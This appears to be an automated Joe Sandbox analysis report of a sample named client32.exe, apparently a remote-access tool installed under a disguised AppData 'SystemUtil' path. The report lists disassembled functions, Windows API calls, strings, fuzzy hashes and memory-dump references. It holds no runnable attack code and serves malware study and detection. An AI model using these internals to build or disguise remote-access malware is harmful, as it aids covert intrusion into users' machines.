Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: 1430746a0f98061322cf4cd9f2579c3270cb512d143b60c0712b779620f16d7b
Instruction ID: 47d799f7ff9784331f0040f7ab9509ee09f3e91dee89231a994c1442b422e5e0
Opcode Fuzzy Hash: 1430746a0f98061322cf4cd9f2579c3270cb512d143b60c0712b779620f16d7b
Instruction Fuzzy Hash: BAF08272640318AFC710DF94D884E5F77A8FB48761F00C81AF959D7240D670E851CFA1

Function 11134C80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5

Strings

Client, xrefs: 11134C9C
*AutoICFConfig, xrefs: 11134C97

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D

Function 1106FD70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 1106FDC7
EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6

Strings

Push, xrefs: 1106FD96

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92

Function 68C6A4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(68CAB898,00000000,?,?,?,68C6DA7F,?,00000000), ref: 68C6A503
InterlockedExchange.KERNEL32(?,00000000), ref: 68C6A568
Sleep.KERNEL32(00000000,?,68C6DA7F,?,00000000), ref: 68C6A581
LeaveCriticalSection.KERNEL32(68CAB898,00000000), ref: 68C6A5B3

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
String ID:
API String ID: 4212191310-0
Opcode ID: e8e1f9f742c3f83dec50165d0c71164db14cf71ad983cb8989fcf18ed8485135
Instruction ID: 9c2487509eb8f3d3d32d66f46bf6c5ca1da558a4c317ac7d82ca159f96b605a4
Opcode Fuzzy Hash: e8e1f9f742c3f83dec50165d0c71164db14cf71ad983cb8989fcf18ed8485135
Instruction Fuzzy Hash: 8021DAB6900518DFDB118F18D8C575EB7B9EFC6328F410437E966A3540E371E8818B91

Function 11140290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\client32.exe,00000104,?,111404E3,?), ref: 111402B9

Strings

C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, xrefs: 111402A4, 111402B2

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
API String ID: 2251294070-1686329407
Opcode ID: 25a4bea00498d77d58fd3c12edc1f3de12433bdfe34951dec407084350f47ebf
Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
Opcode Fuzzy Hash: 25a4bea00498d77d58fd3c12edc1f3de12433bdfe34951dec407084350f47ebf
Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791

Function 110151B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
CloseHandle.KERNEL32(00000000), ref: 110151D8

Strings

\\.\NSWFPDrv, xrefs: 110151C2

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1

Function 1106132B Relevance: 4.7, APIs: 3, Instructions: 170COMMON

Download Yara Rule

APIs

_fgets.LIBCMT ref: 11061362
_strpbrk.LIBCMT ref: 110613C9
_fgets.LIBCMT ref: 110614CC

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _fgets$_strpbrk
String ID:
API String ID: 2467700830-0
Opcode ID: d38be73a97708ed3cebce13a6138e1835c16ac10043bd1595ceda96381bbbe7b
Instruction ID: e042e00db1c15bd3ea3848fad782c45c58cddd6e5cc14a0db7c635f2d40bc436
Opcode Fuzzy Hash: d38be73a97708ed3cebce13a6138e1835c16ac10043bd1595ceda96381bbbe7b
Instruction Fuzzy Hash: 3D51C471E0466A9BDB11CB64DC40FAFBBBCAF85345F0482D8E949D7280EB31AA45CF51

Function 111585E0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 11158603

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _calloc
String ID:
API String ID: 1679841372-0
Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0

Function 68C68FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C68FE4
getsockname.WSOCK32(?,?,00000010,?,02B92E80,?), ref: 68C69005
WSAGetLastError.WSOCK32(?,?,00000010,?,02B92E80,?), ref: 68C6902E

Part of subcall function 68C65840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68C68F91,00000000,00000000,68CAB8DA,?,00000080), ref: 68C65852

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast_memsetgetsocknameinet_ntoa
String ID:
API String ID: 3066294524-0
Opcode ID: 46eaf88fa59611fed170d7d7e8d1889553365993d9fcfd3e54d3ee9fad565dd1
Instruction ID: c47fcd42d791069f47ff0ccbaa186c5b0a32f442ac9ba26f426a272e5895e32d
Opcode Fuzzy Hash: 46eaf88fa59611fed170d7d7e8d1889553365993d9fcfd3e54d3ee9fad565dd1
Instruction Fuzzy Hash: 451121B6D00108AFCB00DFA9E8419BEB7F8EF49218F40456AEC15E7240E7706A148B91

Function 1110E3C0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
__wsplitpath.LIBCMT ref: 1110E405
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DirectoryInformationSystemVolume__wsplitpath
String ID:
API String ID: 395646034-0
Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65

Function 1109DCF0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18

Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,774CF550,?,00000000), ref: 1109DC58
Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,006A1080,006A1080,006A1080,006A1080,006A1080,006A1080,006A1080,111EAB1C,?,00000001,00000001), ref: 1109DCA0
Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,006A1080,?,00000001,00000001), ref: 1109DCB3

CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
String ID:
API String ID: 2256153495-0
Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61

Function 1110C6B0 Relevance: 3.8, APIs: 3, Instructions: 57COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(111EC8B8,62C07B5E,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
EnterCriticalSection.KERNEL32(111EC8B8,62C07B5E,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterInitializeLeave
String ID:
API String ID: 3991485460-0
Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91

Function 11067F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012

Strings

??CTL32.DLL, xrefs: 11067FD3

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
